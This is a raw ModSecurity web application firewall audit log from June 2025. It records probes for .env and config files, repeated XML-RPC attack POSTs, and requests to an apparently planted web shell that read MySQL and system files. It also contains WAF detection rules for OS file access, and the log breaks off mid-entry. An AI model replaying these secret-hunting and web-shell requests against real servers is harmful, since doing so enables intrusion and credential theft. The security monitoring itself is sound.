127.0.0.1 7081 --2d413802-B-- GET /ebextensions.config HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2d413802-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --2d413802-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/ebextensions.config"] [unique_id "aE7adl0gAfK4E6yok-jSXwAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998198407132 975225 (- - -) Stopwatch2: 1749998198407132 975225; combined=1812, p1=362, p2=1347, p3=0, p4=0, p5=103, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2d413802-Z-- --6d405d3a-A-- [15/Jun/2025:20:06:41.388731 +0530] aE7aeIVZSDEfL5zL02JA7gAAAAI 128.199.112.101 34208 127.0.0.1 7081 --6d405d3a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6d405d3a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6d405d3a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7aeIVZSDEfL5zL02JA7gAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998200419899 968888 (- - -) Stopwatch2: 1749998200419899 968888; combined=2236, p1=351, p2=1475, p3=40, p4=61, p5=192, sr=92, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6d405d3a-Z-- --c92b7c0d-A-- [15/Jun/2025:20:06:44.573678 +0530] aE7ae5K-05zbifgH_rT3KQAAAAU 185.177.72.204 34462 127.0.0.1 7081 --c92b7c0d-B-- GET /bucket-name/config/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c92b7c0d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --c92b7c0d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/bucket-name/config/.env"] [unique_id "aE7ae5K-05zbifgH_rT3KQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998203605971 967763 (- - -) Stopwatch2: 1749998203605971 967763; combined=1927, p1=391, p2=1430, p3=0, p4=0, p5=105, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c92b7c0d-Z-- --12572b74-A-- [15/Jun/2025:20:07:41.372500 +0530] aE7atAG_OhOIIVz6TXRxnwAAAAA 128.199.112.101 59872 127.0.0.1 7081 --12572b74-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --12572b74-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --12572b74-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7atAG_OhOIIVz6TXRxnwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998260428373 944194 (- - -) Stopwatch2: 1749998260428373 944194; combined=2337, p1=365, p2=1549, p3=42, p4=62, p5=194, sr=100, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --12572b74-Z-- --40dd4e42-A-- [15/Jun/2025:20:08:41.743358 +0530] aE7a8PRzj1BwdxQoarvKygAAAAo 128.199.112.101 57410 127.0.0.1 7081 --40dd4e42-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --40dd4e42-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --40dd4e42-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7a8PRzj1BwdxQoarvKygAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998320806428 937005 (- - -) Stopwatch2: 1749998320806428 937005; combined=2500, p1=354, p2=1695, p3=52, p4=77, p5=204, sr=102, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --40dd4e42-Z-- --e0643a05-A-- [15/Jun/2025:20:09:41.596892 +0530] aE7bLFu1-lKBbvo2E9pT6gAAAAw 128.199.112.101 40222 127.0.0.1 7081 --e0643a05-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --e0643a05-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e0643a05-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7bLFu1-lKBbvo2E9pT6gAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998380667895 929053 (- - -) Stopwatch2: 1749998380667895 929053; combined=2094, p1=409, p2=1307, p3=42, p4=61, p5=172, sr=95, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0643a05-Z-- --37c55360-A-- [15/Jun/2025:20:10:41.280167 +0530] aE7baAG_OhOIIVz6TXRx4gAAAAA 128.199.112.101 53406 127.0.0.1 7081 --37c55360-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --37c55360-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --37c55360-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7baAG_OhOIIVz6TXRx4gAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998440358364 921877 (- - -) Stopwatch2: 1749998440358364 921877; combined=2132, p1=372, p2=1314, p3=41, p4=65, p5=216, sr=111, sw=124, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --37c55360-Z-- --29d4b318-A-- [15/Jun/2025:20:10:47.810591 +0530] aE7bb_Rzj1BwdxQoarvK-gAAAAo 52.4.229.9 53644 127.0.0.1 7081 --29d4b318-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/mysql&viewfile=//etc/mysql/my.cnf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.4.229.9 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --29d4b318-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3590 Connection: close Content-Type: text/html; charset=UTF-8 --29d4b318-H-- Message: Warning. Matched phrase "etc/mysql/my.cnf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/mysql/my.cnf found within ARGS:viewfile: /etc/mysql/my.cnf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/mysql/my.cnf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/mysql/my.cnf found within ARGS:viewfile: /etc/mysql/my.cnf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7bb_Rzj1BwdxQoarvK-gAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1749998447806387 4256 (- - -) Stopwatch2: 1749998447806387 4256; combined=2375, p1=347, p2=1892, p3=40, p4=37, p5=59, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --29d4b318-Z-- --f9d14f59-A-- [15/Jun/2025:20:11:11.630365 +0530] aE7bh10gAfK4E6yok-jSxgAAAA4 44.223.193.255 52488 127.0.0.1 7081 --f9d14f59-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/profile.d&viewfile=//etc/profile.d/apps-bin-path.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.223.193.255 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --f9d14f59-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3339 Connection: close Content-Type: text/html; charset=UTF-8 --f9d14f59-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/apps-bin-path.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7bh10gAfK4E6yok-jSxgAAAA4"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/apps-bin-path.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7bh10gAfK4E6yok-jSxgAAAA4"] Apache-Handler: application/x-httpd-php Stopwatch: 1749998471626468 3950 (- - -) Stopwatch2: 1749998471626468 3950; combined=2125, p1=347, p2=1615, p3=33, p4=31, p5=99, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f9d14f59-Z-- --b8ba9f3c-A-- [15/Jun/2025:20:11:41.848677 +0530] aE7bpF0gAfK4E6yok-jS1gAAAA4 128.199.112.101 34086 127.0.0.1 7081 --b8ba9f3c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b8ba9f3c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b8ba9f3c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7bpF0gAfK4E6yok-jS1gAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998500925667 923091 (- - -) Stopwatch2: 1749998500925667 923091; combined=2330, p1=469, p2=1512, p3=36, p4=50, p5=165, sr=92, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b8ba9f3c-Z-- --7bf49512-A-- [15/Jun/2025:20:12:40.969948 +0530] aE7b4IVZSDEfL5zL02JBhgAAAAI 128.199.112.101 40656 127.0.0.1 7081 --7bf49512-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7bf49512-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7bf49512-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7b4IVZSDEfL5zL02JBhgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998560019179 950826 (- - -) Stopwatch2: 1749998560019179 950826; combined=2244, p1=401, p2=1409, p3=54, p4=72, p5=190, sr=124, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7bf49512-Z-- --af0a1105-A-- [15/Jun/2025:20:13:41.732183 +0530] aE7cHBLQPChAjmM6-0ipGAAAAAQ 128.199.112.101 41028 127.0.0.1 7081 --af0a1105-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --af0a1105-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --af0a1105-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7cHBLQPChAjmM6-0ipGAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998620784693 947555 (- - -) Stopwatch2: 1749998620784693 947555; combined=2206, p1=372, p2=1463, p3=42, p4=62, p5=165, sr=105, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --af0a1105-Z-- --6935a82f-A-- [15/Jun/2025:20:14:41.438606 +0530] aE7cWPRzj1BwdxQoarvLbAAAAAo 128.199.112.101 32940 127.0.0.1 7081 --6935a82f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --6935a82f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6935a82f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7cWPRzj1BwdxQoarvLbAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749998680461450 977213 (- - -) Stopwatch2: 1749998680461450 977213; combined=2285, p1=355, p2=1513, p3=45, p4=70, p5=185, sr=97, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6935a82f-Z-- --f2812e2e-A-- [15/Jun/2025:20:15:41.724161 +0530] aE7clED4emz4pcZ5aGTadgAAAAE 128.199.112.101 46224 127.0.0.1 7081 --f2812e2e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f2812e2e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f2812e2e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file 